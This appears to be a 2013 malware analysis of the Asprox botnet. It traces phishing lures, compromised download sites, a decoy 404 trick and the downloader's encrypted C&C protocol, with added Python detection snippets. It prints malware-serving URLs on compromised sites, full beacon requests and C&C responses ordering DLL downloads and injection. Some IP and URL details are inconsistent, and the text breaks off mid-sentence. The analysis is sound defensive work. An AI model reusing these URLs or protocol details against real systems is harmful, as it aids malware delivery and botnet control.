It goes like this:
Email distribution
Phishing emails in this campaign seem to be sent mostly from hacked web servers.
Phishing email
The phishing email directs the victim to follow a URL to "Get Shipment Info" or to enter the shipment number on the "Tracking page" (DHL), to "Print Receipt" to receive a parcel (FedEx), to "Download It" to use a flight ticket (American Airlines) or to display a "Shipment Label" (UPS).
The latest (September/October 2013) templates pretend to be wedding invitations or voicemail from WhatsApp.
Downloader sites
The phishing email points to compromised websites that serve a ZIP file containing a malicious executable, the Asprox downloader. At the beginning of May 2013 these sites tended to be mainly compromised Joomla 1.5 servers. At the end of May we see quite a lot of websites hosted in the US, not necessarily Joomla related. The Asprox botnet, or the people behind it, probably use several exploits to compromise various PHP websites.
Links from the phishing emails lead to a malicious PHP script on the compromised websites. This PHP script proxies all requests to another backend server (currently I know of only one IP in Russia (184.108.40.206), but there are definitely more such servers). In case of failure, suspicion or an exceeded request threshold, the PHP script responds with a fake "404 Not Found" error code.
Download zipfile
The victim downloads the ZIP file from the site; it contains an executable file, for example "Delivery Information.exe". The executable has the icon of a Word file to convince the victim to open/run it.
Execute the downloader
When the victim executes the malware, it mimics something benign: Notepad is opened to show some bogus tracking information.
The malware masquerades as a Windows binary (svchost.exe) to run hidden and undetected in the background.
The exe file is removed and replaced with a TXT file.
Command&Control center(s) - dozens of nginx proxies
The malware contacts a round-robin list of C&Cs for commands and for downloading other malware. The list of IPs is hardcoded in the downloader binary. An updated list of C&Cs can be obtained from the C&C. The sites contacted are another farm of compromised web servers running nginx configured as a reverse proxy. All requests are proxied to a backend C&C server.
Download other germs
Other malware is then downloaded, executed, and so on and so forth.
Other layers???
... there are possibly more layers.
The malware generated in the WhatsApp phishing campaign has the icon of a note to fool the victims into thinking that it is a sound file.
Interesting bits
These bits make it interesting:
Scale - The group seems to have been running this very same infrastructure for at least 1 year. New evasion features are added over time, like encrypting the requests. The current campaign has, within 2 weeks, used dozens of compromised Joomla servers to serve the downloader malware. It is using dozens of servers (mostly compromised web servers) to send spam, and as of writing the backend C&C is active on at least 34 IP addresses at once. If you consider that they probably have more to move on to and use once the current ones are closed, the scale is really like a small enterprise.
Evasion - Malicious scripts on compromised download sites stop serving malware after some time and respond with a fake HTTP 404 Not Found response, probably to encourage lamer Joomla admins to stay on the current vulnerable version, as it seems that the problem went away by itself. Similar evasion techniques are implemented on the C&C sites.
Automation - New obfuscated malware binaries for the downloader are generated at least twice a day. The FakeAV binaries downloaded from the C&C are automatically generated every 6 minutes. This ensures that samples at the time of execution are not known to your antivirus. It usually takes AV companies 1-3 days to make a signature and propagate it for download by the client, and then more days until the victim bothers to update the antivirus signatures.
Cloud - The availability of cheap cloud services allows the "throw-away" C&C to be hosted anywhere, especially when the host is a compromised server paid for by somebody else :). It is surprising that the 1st and 2nd layers of C&Cs are not hosted on some bullet-proof hosting in China or Ukraine, but in countries like France, the United Kingdom, the USA, the Netherlands or Germany.
Phishing Emails
Sample DHL:
If the links are not working, please move message to "Inbox" folder.
26.04.2013 PACK STATION
DHL Ship Shipment Notification
On April 25, 2013 a shipment label was printed for delivery.
The shipment number of this package is 36085695.
To get additional info about this shipment use any of these options:
1) Click the following URL in your browser:
Get Shipment Info
2) Enter the shipment number on tracking page:
For further assistance, please call DHL Customer Service.
For International Customer Service, please use official DHL site.
This message was created by DHL Ship, a product of DHL, at the request
of the sender. No authentication of email address has been performed.
Deutsche Post DHL 2013 DHL International GmbH. All rights reserved.
Sample DHL Express:
Downloader sites
The majority of the sites serving the malicious downloader file in the May campaign seem to be servers running Joomla 1.5.
The backend script serving the downloader applies some limitations on the download of the malware:
- limit of 4 downloads per IP - the count seems to be shared across the botnet infrastructure; this limitation probably keeps it low profile against services like Google Badware
- only certain User-Agents are allowed
- probably some other filtering (geoip?, language?)
$ curl http://www.into-focus.de/templates/system/onlines.php?get_info=4_36160170
<!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN">
<html><head><title>404 Not Found</title></head><body>
<h1>Not Found</h1>
<p>The requested URL was not found on this server.</p>
<hr>
</body></html>
Looks like:
404 Not Found
Not Found
The requested URL was not found on this server.
You can compare it with a real "404 Not Found" message - find 10 differences :) :
$ curl http://www.into-focus.de/templates/system/onlines_not_existing_file_23232ndljn2l3d.php
Which looks like:
404 Not Found
Not Found
The requested URL /templates/system/onlines_not_existing_file_23232ndljn2l3d.php was not found on this server.
Apache Server at www.into-focus.de Port 80
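The two responses differ in exactly the ways a scanner can check for: the genuine Apache page echoes the requested path and carries a server signature footer, the scripted decoy does neither. The check below is an added example (not the author's tooling); the decoy body is the one served above, the Apache body is reconstructed from the rendered text, so its exact markup (the <address> footer) is an assumption.

```python
import re

# Constructed for this example from the two curl responses above. The decoy
# body is copied as served; the genuine Apache body is reconstructed from the
# rendered text, so its exact markup (the <address> footer) is an assumption.
DECOY_404 = (
    '<!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN">\n'
    '<html><head><title>404 Not Found</title></head><body>\n'
    '<h1>Not Found</h1>\n<p>The requested URL was not found on this server.</p>\n'
    '<hr>\n</body></html>'
)
APACHE_404 = (
    '<!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN">\n'
    '<html><head><title>404 Not Found</title></head><body>\n'
    '<h1>Not Found</h1>\n<p>The requested URL /templates/system/'
    'onlines_not_existing_file_23232ndljn2l3d.php was not found on this server.</p>\n'
    '<hr>\n<address>Apache Server at www.into-focus.de Port 80</address>\n'
    '</body></html>'
)


def decoy_404_indicators(body, requested_path, host):
    """Return the traits that distinguish the scripted decoy from the web
    server's own error page; an empty list means it looks genuine."""
    reasons = []
    # Apache echoes the requested path inside the <p> text; the decoy never does.
    if requested_path not in body:
        reasons.append("requested path not echoed in body")
    # Apache appends a signature footer. A server with ServerSignature Off also
    # lacks it, so treat the missing path as the stronger of the two signals.
    footer = re.search(r"<address>(.*?)</address>", body, re.S)
    if footer is None:
        reasons.append("no server signature footer")
    elif host not in footer.group(1):
        reasons.append("signature footer names a different host")
    return reasons


def is_decoy_404(body, requested_path, host):
    return bool(decoy_404_indicators(body, requested_path, host))


if __name__ == "__main__":
    print(decoy_404_indicators(DECOY_404, "/templates/system/onlines.php", "www.into-focus.de"))
    print(decoy_404_indicators(
        APACHE_404, "/templates/system/onlines_not_existing_file_23232ndljn2l3d.php",
        "www.into-focus.de"))
```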
The download sites are being reused at the same time for different phishing campaigns and they serve different malware binaries based on the type of the request.
| Request | Campaign | Sample | Name of Exe |
|---|---|---|---|
| ?ticket= | American Airlines | http://andiburns.de/img/get.php?ticket=ss00_323 | Electronic Ticket.exe |
| ?receipt= | FedEx | http://andiburns.de/img/get.php?receipt=ss00_323 | Postal Receipt No00843412843.exe |
| ?receipt_print= | FedEx | http://andiburns.de/img/get.php?receipt=ss00_323 | Postal Receipt No00843412843.exe |
| ?print= | FedEx | http://andiburns.de/img/get.php?receipt=ss00_323 | Postal Receipt No00843412843.exe |
A sample of the PHP script can be found on this forum. It forwards the requests to some backend server together with information about the IP of the connecting client (taken from proxy headers if present).
Asprox Downloader
The downloader encrypts its requests with RC4 (see the analysis from Trend Micro for more info). The encrypted request is passed to the second layer of C&C. The IP addresses of the C&Cs are hardcoded in the downloader binary. The request contains an MD5 hash identifying the victim computer and some action.
Request gate for work
/index.php?r=gate&id=44641684AA45961586718E5F8309ADD9&group=3004spm&debug=0
The id is an MD5 hash identifying the victim machine. The gate responds with a command for the downloader. So far I have seen 3 commands sent to the downloader - rdl, run, idl. According to the analysis from Trend Micro there are more commands. The gate is quite picky about the format of the request - probably to keep it low-profile against automated probes from anti-malware sites. If you perform the request using an ordinary browser or a command like wget, you will most likely obtain only HTTP 404 Not Found.
rdl - run dll. According to Trend Micro the DLL is encrypted with RC4. After being downloaded it is injected into the svchost.exe running the downloader and executed.
GET http://220.127.116.11:8080/2464168416ED8D7C4F5DE9761273578F92F8D248D6840D149348DD051BD9D0FEF740E8B2D59F7A0F966CA14D65257C66EDC3E2D416B7D6A0F864110F29504F3DEEFF53C24E57724DF8184F83ECEA10 HTTP/1.0
User-Agent: Mozilla/5.0 (Windows; U; MSIE 9.0; Windows NT 9.0; en-US)
Host: 18.104.22.168:8080

HTTP/1.1 200 OK
Server: nginx/1.2.6
Date: Fri, 24 May 2013 18:37:17 GMT
Content-Type: text/html
Content-Length: 86
Connection: close
X-Powered-By: PHP/5.4.4-7
Vary: Accept-Encoding

c=rdl&u=/get/sb222.dll.crp_fdsfsdf&a=1&k=fa785e1d&n=sb222&crc=8822c5d84333d6b5658dcb460d4d27a2

GET http://22.214.171.124:8080/2464168416ED8D7C4F5DE9761273578F92F8D248D6840D149348DD051BD9D0FEF740E8B2D59F7A0F966CA14D65257C66EDC3E2D416B7D6A0F864110F29504F3DEEFF53C24E57724DF8184F83ECEA10 HTTP/1.0
User-Agent: Mozilla/5.0 (Windows; U; MSIE 9.0; Windows NT 9.0; en-US)
Host: 126.96.36.199:8080

HTTP/1.1 200 OK
Server: nginx/1.2.6
Date: Fri, 24 May 18:37:19 GMT
Content-Type: text/html
Content-Length: 86
Connection: close
X-Powered-By: PHP/5.4.4-7
Vary: Accept-Encoding

c=rdl&u=/get/pg.dll.crp_bak&a=0&k=52f608b4&crc=214e3b765d01df7a5b28480fa885b84e
run - run executable - since 27-Apr-2013 till 22-05-2013 I have seen only e3943d7369aa6add911aca18b3a507f4.exe, which is some rogue antivirus. Checking the report on VirusTotal/ThreatExpert there are links also to other exe files. Since 23-May-2013 the C&Cs are serving a5347c1b5b4aa9bd13d76736eb57c67f.exe, 6b761f91b02f89f9e695d4b5a87806de.exe and b2f7e9141eb124ce3152352c5df520f7.exe. So far I do not know what the hash filename stands for.
GET http://188.8.131.52:8080/2464168416ED8D7C4F5DE9761273578F92F8D248D6840D149348DD051BD9D0FEF740E8B2D59F7A0F966CA14D65257C66EDC3E2D416B7D6A0F864110F29504F3DEEFF53C24E57724DF8184F83ECEA10 HTTP/1.0
User-Agent: Mozilla/5.0 (Windows; U; MSIE 9.0; Windows NT 9.0; en-US)
Host: 184.108.40.206:8080

HTTP/1.1 200 OK
Server: nginx/1.2.6
Date: Fri, 24 May 2013 18:37:20 GMT
Content-Type: text/html
Content-Length: 86
Connection: close
X-Powered-By: PHP/5.4.4-7
Vary: Accept-Encoding

c=rdl&u=/get/sb222.dll.crp_fdsfsdf&a=1&k=fa785e1d&n=sb222&crc=8822c5d84333d6b5658dcb460d4d27a2
idl - sleep 1 second
GET http://220.127.116.11:8080/2464168416ED8D7C4F5DE9761273578F92F8D248D6840D149348DD051BD9D0FEF740E8B2D59F7A0F966CA14D65257C66EDC3E2D416B7D6A0F864110F29504F3DEEFF53C24E57724DF8184F83ECEA10 HTTP/1.0
User-Agent: Mozilla/5.0 (Windows; U; MSIE 9.0; Windows NT 9.0; en-US)
Host: 18.104.22.168:8080

HTTP/1.1 200 OK
Server: nginx/1.2.6
Date: Fri, 24 May 2013 18:37:22 GMT
Content-Type: text/html
Content-Length: 86
Connection: close
X-Powered-By: PHP/5.4.4-7
Vary: Accept-Encoding

c=idl
Request gate for the list of IPs
/index.php?r=gate/getipslist&id=MACHINEKEY
The id in this case is not the whole MACHINEID (the MD5 identification of the victim), but just the first 8 chars of it. For example:
GET http://22.214.171.124:8080/2464168416ED8D7C4F5DE9761273578F92F8D248D68D0315DA139940438195B2E568CDBBD2927A0A9262AF4E155C0D6692CDE0D117C0A5D5F907433B7E160F399D8227CF
User-Agent: Mozilla/5.0 (Windows; U; MSIE 9.0; Windows NT 9.0; en-US)
Host: 126.96.36.199:8080

The response is an RC4-encrypted list of IPs of the 3rd layer C&C to contact.
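The beacons above share traits that a proxy-log rule can key on (port 8080, a long hex-only path carrying the RC4 blob, the impossible "Windows NT 9.0" User-Agent), and both the work gate and the getipslist gate have a fixed plaintext form once decrypted. The following is an added example that is not the author's tooling: it flags such requests, validates the two decrypted gate forms, and parses the "c=..." responses. The meanings of fields a, k and n are not given on this page, so the parser only carries them through.

```python
import re
from urllib.parse import parse_qs, urlsplit

# Constructed from the exchanges above; an added example, not the author's
# tooling. The beacon URL and the rdl body are the ones captured on 24 May 2013.
UA_SEEN = "Mozilla/5.0 (Windows; U; MSIE 9.0; Windows NT 9.0; en-US)"
BEACON_URL = "http://220.127.116.11:8080/2464168416ED8D7C4F5DE9761273578F92F8D248D6840D149348DD051BD9D0FEF740E8B2D59F7A0F966CA14D65257C66EDC3E2D416B7D6A0F864110F29504F3DEEFF53C24E57724DF8184F83ECEA10"
RDL_BODY = "c=rdl&u=/get/sb222.dll.crp_fdsfsdf&a=1&k=fa785e1d&n=sb222&crc=8822c5d84333d6b5658dcb460d4d27a2"
KNOWN_COMMANDS = {"rdl": "download DLL and inject into svchost.exe",
                  "run": "download and run exe", "idl": "sleep 1 second"}
# Plaintext gate routes (visible only after RC4 decryption) and their id length.
ID_LEN = {"gate": 32, "gate/getipslist": 8}


def beacon_indicators(url, user_agent):
    """Traits of an outbound request matching the downloader beacon above;
    the more that match, the stronger the detection."""
    parts, hits = urlsplit(url), []
    if parts.port == 8080:
        hits.append("port 8080")
    if re.fullmatch(r"/[0-9A-Fa-f]{64,}", parts.path):  # RC4 blob hex-encoded in the path
        hits.append("long hex-only path")
    if "Windows NT 9.0" in user_agent:                    # no such Windows version exists
        hits.append("bogus Windows NT 9.0 user agent")
    return hits


def classify_gate_request(path_and_query):
    """Validate a decrypted gate request: r=gate carries the full 32-hex MD5
    machine id, r=gate/getipslist only its first 8 chars. None if malformed."""
    q = {k: v[0] for k, v in parse_qs(urlsplit(path_and_query).query).items()}
    route, vid = q.get("r"), q.get("id", "")
    if route not in ID_LEN or not re.fullmatch(r"[0-9A-Fa-f]{%d}" % ID_LEN[route], vid):
        return None
    return route, vid, q.get("group")


def parse_gate_response(body):
    """Parse the plaintext 'c=...' body returned through the nginx proxy.
    Fields a, k and n also appear on the wire; their meaning is not known here."""
    fields = {k: v[0] for k, v in parse_qs(body).items()}
    cmd = fields.pop("c", None)
    if cmd not in KNOWN_COMMANDS:
        raise ValueError(f"unknown or missing command: {cmd!r}")
    if cmd == "rdl" and "u" not in fields:   # every rdl seen above carries a path
        raise ValueError("rdl without a download path")
    return {"command": cmd, "meaning": KNOWN_COMMANDS[cmd], **fields}


if __name__ == "__main__":
    print(beacon_indicators(BEACON_URL, UA_SEEN))
    print(classify_gate_request("/index.php?r=gate&id=44641684AA45961586718E5F8309ADD9&group=3004spm&debug=0"))
    print(parse_gate_response(RDL_BODY))
```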
Command&Control center(s)
Current list of active C&C sites - updated 2013-07-11
Download other germs
Files are downloaded as exe (a plain exe file to be executed) or as dll. The DLLs have the extension crp and seem to have very high entropy, which means they are either compressed or encrypted. More analysis of the downloader is needed to determine what happens with the dll files after downloading.
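The "very high entropy" observation is easy to reproduce on any fetched .crp sample. The measurement below is an added example, not the author's code; the 7.5 bits/byte threshold is a common rule of thumb and not a value from this page, and the sample buffers are constructed stand-ins for a .crp download and a plain file.

```python
import math
import os
from collections import Counter


def shannon_entropy(data: bytes) -> float:
    """Bits of entropy per byte: 0.0 for a constant buffer, 8.0 for a
    uniform byte distribution (what RC4 output or packed data looks like)."""
    if not data:
        return 0.0
    n = len(data)
    return -sum(c / n * math.log2(c / n) for c in Counter(data).values())


def looks_packed_or_encrypted(data: bytes, threshold: float = 7.5) -> bool:
    """Flag payloads near the 8-bit ceiling, the trait the .crp DLLs show.
    The threshold is a rule of thumb (assumption), not a value from the page."""
    return shannon_entropy(data) >= threshold


if __name__ == "__main__":
    # Constructed samples: random bytes stand in for a .crp download, a
    # repetitive buffer for the plain TXT file the downloader leaves behind.
    crp_like = os.urandom(4096)
    text_like = b"Tracking number 36085695: shipment label printed.\r\n" * 80
    for name, blob in (("sb222.dll.crp", crp_like), ("notes.txt", text_like)):
        print(f"{name}: {shannon_entropy(blob):.2f} bits/byte, "
              f"suspicious={looks_packed_or_encrypted(blob)}")
```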
So far I have identified these files that can be downloaded:
This exe file seems to be FakeAV - some rogue antivirus. Once executed it reports itself to some registration site in Hong Kong: